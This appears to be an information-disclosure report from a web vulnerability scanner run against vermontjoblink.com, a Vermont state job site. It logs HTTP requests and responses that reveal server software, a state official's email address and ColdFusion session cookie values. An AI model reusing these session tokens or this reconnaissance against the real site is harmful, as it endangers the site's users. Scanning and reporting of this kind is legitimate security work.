GET /ada/global/spellchecker/googiespell/cookiesupport.js HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK Content-Length: 718 Content-Type: application/x-javascript Content-Location: https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/cookiesupport.js Last-Modified: Mon, 18 Oct 2010 13:02:48 GMT Accept-Ranges: bytes ETag: "08c55c3c46ecb1:ea4" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Date: Fri, 29 Apr 2011 21:06:52 GMT
The following email addresses were disclosed in the response:
amix@amix.dk
joseph.lucia@state.vt.us
Request
GET /ada/global/spellchecker/googiespell/googiespell.js HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK Content-Length: 35139 Content-Type: application/x-javascript Content-Location: https://www.vermontjoblink.com/ada/global/spellchecker/googiespell/googiespell.js Last-Modified: Mon, 18 Oct 2010 13:02:48 GMT Accept-Ranges: bytes ETag: "08c55c3c46ecb1:ea4" Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Date: Fri, 29 Apr 2011 21:06:51 GMT
/**** Last Modified: 13/05/07 00:25:28
GoogieSpell Google spell checker for your own web-apps :) Copyright Amir Salihefendic 2006 LICENSE GPL (see gpl.txt for more information ...[SNIP]... rietary software! There is another license that permits you to use this script with proprietary software. Check out:... for more info. AUTHOR 4mir Salihefendic (http://amix.dk) - amix@amix.dk VERSION 4.0 ****/ var GOOGIE_CUR_LANG = null; var GOOGIE_DEFAULT_LANG = "en";
function GoogieSpell(img_dir, server_url) { var cookie_value; var lang; cookie_value = getCoo ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/global/style/cfmstyle.css?appname=Vermont&maindir=/ada&cssversion=8 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; TEST=1; SYSTRANLANGUAGE=en
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:06:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Last-Modified: Tue, 15 Nov 2000 12:45:26 GMT Content-Type: text/css
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/leavesite.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_eligibility_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_forgotpass.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:29 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_login_fnc.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:14:18 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- URL validated --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_offices_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email addresses were disclosed in the response:
joseph.lucia@state.vt.us
yourfullname.joblink@gmail.com
Request
GET /ada/mn_protectyourself_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:14:20 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]... </a>, such as yourfullname.joblink@gmail.com, for each website where you post a resume. You can have emails from the new account forwarded to your real personal email address. If you start getting bogus job offers, you can determine from whic ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_quicksearch_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:54 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The following email address was disclosed in the response:
joseph.lucia@state.vt.us
Request
GET /ada/mn_registration_dsp.cfm?reg%5Ftype=em HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:11:53 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache location: mn_empagreement_dsp.cfm Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
